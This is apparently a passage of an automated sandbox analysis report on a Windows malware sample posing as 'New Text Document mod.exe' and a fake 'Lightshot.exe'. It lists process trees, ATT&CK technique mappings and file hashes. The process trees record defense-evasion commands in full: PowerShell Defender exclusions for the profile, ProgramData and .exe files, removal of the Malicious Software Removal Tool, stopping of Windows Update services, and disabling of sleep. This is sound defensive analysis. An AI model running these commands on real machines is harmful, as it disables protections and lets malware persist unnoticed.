C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3984 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Executes dropped EXE
PID:1284 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:2692
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2088,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=5132 /prefetch:23⤵PID:2096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3992,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3320 /prefetch:83⤵PID:3028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3532,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3732 /prefetch:83⤵PID:3820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3880,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=5164 /prefetch:23⤵PID:5532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4996,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=5252 /prefetch:23⤵PID:5508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3288,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=5072 /prefetch:13⤵PID:5952
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5952 -s 12644⤵PID:5348
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:304 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:5236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5932
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3764
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4036
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4140
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1964
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:1480
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3928
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4340
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3852
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
- Checks SCSI registry key(s)
PID:1300
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1524
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:3448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4752 -ip 47522⤵PID:1604
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2608
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1592
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4344
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5156 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3988
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5164
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5216
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5448 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5456
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5584 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5592
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5792 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5804
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5924 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5968
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5936 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6020
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:5948 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6124
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:5960 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6044
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5980
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6060
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:1780
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3400
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5220
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4380 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4776 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2068
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5988
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3196 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1720
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2284
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:968 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3092
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5852 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5452
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:3656 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3788
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:5712 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6044
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:1348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5888
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5924
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5876
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2672
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5740
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5140
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3608
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies data under HKEY_USERS
PID:5844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4500 -ip 45002⤵PID:4136
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 3776 -ip 37762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:440
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 1044 -ip 10442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5140
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 400 -p 8 -ip 82⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4752
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 3440 -ip 34402⤵PID:5436
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 5348 -ip 53482⤵PID:1112
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3288 -ip 32882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:236
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 2392 -ip 23922⤵PID:4276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 568 -ip 5682⤵PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 568 -ip 5682⤵PID:5724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2256 -ip 22562⤵PID:1720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4704 -ip 47042⤵PID:4780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3152 -ip 31522⤵PID:2100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5756 -ip 57562⤵PID:3352
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 5668 -ip 56682⤵PID:4728
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 1424 -ip 14242⤵PID:3676
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 5872 -ip 58722⤵PID:4996
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 3968 -ip 39682⤵PID:5376
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:772
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3172
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1352
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:3064 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1648 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5348
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6096
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:324 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5836
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5164 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5584
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1108
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5580
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:1624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2068
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:1192 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4620
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:3992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:748
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:1252 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4248
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5560
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5152
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4776
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1064
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2672
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1904
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5348
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5780
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4692
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5836
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5200
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:2776
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:288
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1416
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:5116
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1984
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2320
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2676
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3276
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5252
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000108 000000841⤵PID:1424
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e0 000000841⤵PID:5020
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000a0 000000841⤵PID:3192
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000a0 000000841⤵PID:5216
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 000000841⤵PID:3264
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000108 000000841⤵PID:3648
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000114 000000841⤵PID:2892
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 000000841⤵PID:3028
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000a0 000000841⤵PID:1400
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f8 000000841⤵PID:2148
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000108 000000841⤵PID:4776
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000098 000000841⤵PID:1448
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f8 000000841⤵PID:1636
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f8 000000841⤵PID:5872
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000118 000000841⤵PID:2680
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 000000841⤵PID:3900
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000108 000000841⤵PID:4952
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000dc 000000841⤵PID:4124
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000dc 000000841⤵PID:3376
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000108 000000841⤵PID:1776
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e0 000000841⤵PID:4896
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000a0 000000841⤵PID:2648
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000108 000000841⤵PID:1788
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000fc 000000841⤵PID:840
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000dc 000000841⤵PID:3172
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 000000841⤵PID:640
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d4 000000841⤵PID:4308
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000098 000000841⤵PID:4496
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000013c 000000841⤵PID:6048
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000a4 000000841⤵PID:3968
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e8 000000841⤵PID:1788
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000100 000000841⤵PID:840
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e8 000000841⤵PID:3048
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1608
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
4Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
1Peripheral Device Discovery
3Query Registry
11Remote System Discovery
1System Information Discovery
8System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
753KB
MD580421089b46d27ad31bba48f8946af3f
SHA171f6418b3ad4310c579f0f50beeff472964d349a
SHA25611f931102f640ea8406d95c2eebeadd1462fd205bc651dac57ac1bcac922e8f5
SHA512d088ff505dc0d6e1f97e466b7e6459d5b8bfcf3ac7676f60851f2af935009a5b4297598725f799bb8d5900e876879d505a78898a7f6a14babe271b8cd134622e
-
Filesize
40B
MD5d8fdec97ff24a9d3276907d69ad0f6aa
